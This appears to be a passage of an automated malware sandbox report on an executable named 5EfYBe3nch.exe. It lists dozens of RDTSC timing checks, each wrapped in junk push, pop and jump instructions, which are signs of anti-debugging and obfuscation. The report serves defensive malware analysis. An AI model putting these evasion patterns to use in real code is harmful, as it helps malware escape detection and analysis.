                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC6B11 second address: BC6B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC6EC7 second address: BC6ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC6ECD second address: BC6ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC6ED1 second address: BC6ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC70D2 second address: BC70D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC70D6 second address: BC70E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC70E0 second address: BC70E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC71AE second address: BC71B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC728A second address: BC72A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD668F2A63Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72A6 second address: BC72AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72AA second address: BC72AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72AE second address: BC72BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72BE second address: BC72C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72C2 second address: BC72C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72C6 second address: BC72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FD668F2A642h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 jbe 00007FD668F2A638h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72F0 second address: BC72F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC72F4 second address: BC731B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD668F2A649h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC757C second address: BC758D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD668F2A76Bh 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC758D second address: BC7591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7591 second address: BC75AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD668F2A76Fh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC792C second address: BC7930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7930 second address: BC7961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007FD668F2A766h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 ja 00007FD668F2A766h 0x0000001e popad 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7961 second address: BC7966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7B2E second address: BC7B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FD668F2A76Ch 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7CBE second address: BC7CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7D23 second address: BC7D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7D27 second address: BC7D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7D43 second address: BC7D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7D47 second address: BC7D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7D4B second address: BC7D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7D58 second address: BC7DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push ebx 0x0000000c pushad 0x0000000d mov ecx, dword ptr [ebp+122D3661h] 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 pop edx 0x00000017 lea eax, dword ptr [ebp+1248171Ch] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FD668F2A638h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 and ecx, dword ptr [ebp+122D3609h] 0x0000003d nop 0x0000003e push esi 0x0000003f je 00007FD668F2A63Ch 0x00000045 pop esi 0x00000046 push eax 0x00000047 jmp 00007FD668F2A63Fh 0x0000004c nop 0x0000004d call 00007FD668F2A644h 0x00000052 mov cx, ax 0x00000055 pop edi 0x00000056 lea eax, dword ptr [ebp+124816D8h] 0x0000005c push edi 0x0000005d adc di, 555Ch 0x00000062 pop edx 0x00000063 nop 0x00000064 je 00007FD668F2A653h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7DF0 second address: BC7DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BC7DF4 second address: BACCE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FD668F2A64Dh 0x00000010 nop 0x00000011 mov edi, 0C69FD62h 0x00000016 call dword ptr [ebp+1246164Eh] 0x0000001c push edi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BACCE8 second address: BACCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA06 second address: BFFA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A63Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA19 second address: BFFA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD668F2A76Dh 0x0000000d pop edx 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA2F second address: BFFA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD668F2A646h 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA4B second address: BFFA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA4F second address: BFFA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007FD668F2A642h 0x00000013 jmp 00007FD668F2A63Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007FD668F2A63Dh 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA7F second address: BFFA8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA8F second address: BFFA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: BFFA95 second address: BFFA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C00333 second address: C00338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C00338 second address: C00343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C00343 second address: C00347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C064F6 second address: C064FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C064FA second address: C0651F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD668F2A648h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C0668B second address: C06691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C06691 second address: C0669B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD668F2A636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C0669B second address: C066AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD668F2A76Ah 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C06947 second address: C0694D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C0694D second address: C06965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD668F2A76Ah 0x0000000d jng 00007FD668F2A766h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C06965 second address: C06969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C06C47 second address: C06C63 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD668F2A76Eh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C06E19 second address: C06E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A644h 0x00000007 jmp 00007FD668F2A644h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C073D3 second address: C073D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C073D9 second address: C073DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C073DF second address: C073E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C079AA second address: C079AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C096FE second address: C09731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FD668F2A78Ch 0x0000000f jmp 00007FD668F2A774h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FD668F2A766h 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C09731 second address: C09735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1074B second address: C10751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C10751 second address: C10755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C115A9 second address: C115C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD668F2A766h 0x0000000a jnc 00007FD668F2A76Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jg 00007FD668F2A766h 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C11887 second address: C11896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FD668F2A636h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C141B5 second address: C141B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B7B73A second address: B7B740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: B7B740 second address: B7B745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16AD7 second address: C16ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16ADD second address: C16AE7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16DB9 second address: C16DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16DBD second address: C16DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD668F2A768h 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16DCD second address: C16DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16DD2 second address: C16E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A772h 0x00000009 jng 00007FD668F2A766h 0x0000000f jmp 00007FD668F2A779h 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007FD668F2A766h 0x0000001c jno 00007FD668F2A766h 0x00000022 jnc 00007FD668F2A766h 0x00000028 popad 0x00000029 pop edx 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16E23 second address: C16E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C16E29 second address: C16E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A76Fh 0x00000009 popad 0x0000000a jmp 00007FD668F2A778h 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1AF07 second address: C1AF0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1AF0D second address: C1AF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1A67B second address: C1A693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 je 00007FD668F2A636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1A92C second address: C1A941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007FD668F2A76Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C1AC18 second address: C1AC2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20258 second address: C20260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20379 second address: C2037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2037D second address: C20386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20386 second address: C20391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20391 second address: C20395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C20395 second address: C203C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD668F2A63Dh 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FD668F2A644h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C203C4 second address: C203D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD668F2A76Fh 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2051D second address: C20545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD668F2A648h 0x0000000b pop esi 0x0000000c ja 00007FD668F2A65Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C2592E second address: C25932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C25932 second address: C25949 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jbe 00007FD668F2A636h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeRDTSC instruction interceptor: First address: C25949 second address: C2595A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jng 00007FD668F2A79Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
